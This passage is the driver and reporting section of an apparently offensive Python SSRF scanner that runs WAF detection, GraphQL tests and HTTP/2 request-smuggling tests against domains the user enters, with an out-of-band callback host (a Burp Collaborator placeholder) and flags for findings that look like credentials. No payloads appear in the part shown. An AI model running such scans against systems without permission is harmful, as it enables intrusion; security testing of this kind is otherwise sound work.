                groups[key]["max_severity"] = f.severity
            
            if f.out_of_band_hit:
                groups[key]["oob_count"] += 1
            
            if any("token" in p.lower() or "key" in p.lower() or "credential" in p.lower() 
                   for p in f.matched_patterns):
                groups[key]["sensitive"] = True
        
        return groups
    
    async def run_full_scan(self):
        """Run complete scan with all features"""
        
        # Phase 0: WAF Detection
        await self.run_waf_detection()
        
        # Phase 1: Dynamic Discovery (simplified for this example)
        if self.verbose:
            print(f"\n{BOLD}{'='*60}{RESET}")
            print(f"{CYAN}[DISCOVERY]{RESET} Scanning endpoints...")
            print(f"{BOLD}{'='*60}{RESET}")
        
        # Run GraphQL tests
        await self.run_graphql_tests()
        
        # Run HTTP/2 smuggling tests
        await self.run_http2_smuggling_tests()
        
        # Generate HTML report
        await self.generate_html_report()
        
        # Save JSON results
        await self.save_results()
        
        # Print summary
        self.print_summary()
    
    async def save_results(self):
        """Save all results to JSON"""
        data = {
            "target": self.target_domain,
            "timestamp": datetime.now().isoformat(),
            "waf_info": self.waf_info,
            "total_findings": len(self.all_evidence),
            "graphql_findings": self.graphql_findings,
            "smuggling_findings": self.smuggling_findings,
            "blind_callbacks": dict(self.blind_callbacks),
            "findings": [asdict(f) for f in self.all_evidence]
        }
        
        with open(self.results_file, "w", encoding="utf-8") as f:
            json.dump(data, f, indent=2, ensure_ascii=False, cls=CustomJSONEncoder)
        
        print(f"\n{OK} JSON results saved: {BOLD}{self.results_file}{RESET}")
    
    def print_summary(self):
        """Print scan summary"""
        deduped = self.deduplicate_findings()
        
        print(f"\n{BOLD}{'='*60}{RESET}")
        print(f"{GREEN}{BOLD}SCAN SUMMARY - {self.target_domain}{RESET}")
        print(f"{BOLD}{'='*60}{RESET}")
        print(f"  • WAF: {self.waf_info.get('primary', 'None detected')}")
        print(f"  • GraphQL Findings: {len(self.graphql_findings)}")
        print(f"  • HTTP/2 Smuggling: {len(self.smuggling_findings)}")
        print(f"  • Blind Callbacks: {len(self.blind_callbacks)}")
        print(f"  • Unique Vulnerabilities: {len(deduped)}")
        
        for (ep, param), info in deduped.items():
            sev = info["max_severity"]
            col = {"critical": RED, "high": YELLOW, "medium": MAGENTA, "low": BLUE, "info": CYAN}.get(sev, RESET)
            print(f"\n  {col}[{sev.upper()}]{RESET} {ep} → {param}")
            print(f"    Callbacks: {info['oob_count']} | Sensitive: {'YES' if info['sensitive'] else 'NO'}")


# ==================== HELPER CLASSES ====================
@dataclass
class SSRFEvidence:
    phase: str
    technique: str
    url: str
    endpoint: str
    param: str
    payload: str
    status: int
    body_snippet: str
    matched_patterns: List[str]
    severity: str = "info"
    request_headers: Optional[Dict] = None
    response_headers: Optional[Dict] = None
    out_of_band_hit: bool = False


class CustomJSONEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        if isinstance(obj, datetime):
            return obj.isoformat()
        if hasattr(obj, '__dict__'):
            return obj.__dict__
        return super().default(obj)


# ==================== MAIN ====================
async def main():
    print(BANNER)
    
    # Parse arguments
    verbose = True
    enable_graphql = True
    enable_smuggling = True
    enable_html = True
    
    args = sys.argv[1:]
    for arg in args:
        if arg in ["--quiet", "-q"]:
            verbose = False
        elif arg == "--no-graphql":
            enable_graphql = False
        elif arg == "--no-smuggling":
            enable_smuggling = False
        elif arg == "--no-html":
            enable_html = False
    
    # Get target
    print(f"{WARN} How would you like to provide targets?")
    print("  1 - Single domain")
    print("  2 - Comma-separated list")
    print("  3 - File with one domain per line")
    choice = input(f"{WARN} Choose [1/2/3]: ").strip()
    
    targets = []
    if choice == "1":
        target = input(f"{WARN} Enter target: ").strip()
        if target:
            targets = [target]
    elif choice == "2":
        target_list = input(f"{WARN} Enter domains (comma-separated): ").strip()
        targets = [t.strip() for t in target_list.split(',') if t.strip()]
    elif choice == "3":
        filename = input(f"{WARN} File path: ").strip()
        try:
            with open(filename) as f:
                targets = [line.strip() for line in f if line.strip() and not line.startswith('#')]
        except Exception as e:
            print(f"{FAIL} Error reading file: {e}")
            return
    
    if not targets:
        print(f"{FAIL} No targets provided")
        return
    
    # Get callback host
    callback = input(f"{WARN} Callback host [optional]: ").strip()
    if not callback:
        callback = "YOUR.BURP.COLLABORATOR.NET"
    
    # Get delay
    delay_input = input(f"{WARN} Delay between requests (seconds) [0.5]: ").strip()
    delay = float(delay_input) if delay_input else 0.5
    
    print(f"\n{BOLD}{GREEN}Starting scan for {len(targets)} target(s)...{RESET}\n")
    
    # Check dependencies
    if not HTTPX_AVAILABLE:
        print(f"{WARN} httpx not installed. HTTP/2 smuggling disabled. Install: pip install httpx")
    if not JINJA2_AVAILABLE:
        print(f"{WARN} jinja2 not installed. HTML reports disabled. Install: pip install jinja2")
    
    # Scan targets
    for i, target in enumerate(targets, 1):
        print(f"\n{BOLD}{YELLOW}[{i}/{len(targets)}] Processing: {target}{RESET}")
        
        arsenal = UltimateSSRFArsenal(
            target_domain=target,
            rate_limit_delay=delay,
            callback_host=callback,
            verbose=verbose,
            enable_graphql=enable_graphql,
            enable_smuggling=enable_smuggling,
            enable_html_report=enable_html
        )
        
        async with arsenal:
            await arsenal.run_full_scan()
        
        if i < len(targets):
            print(f"\n{DIM}Waiting 5 seconds before next target...{RESET}")
            await asyncio.sleep(5)


if __name__ == "__main__":
    asyncio.run(main())
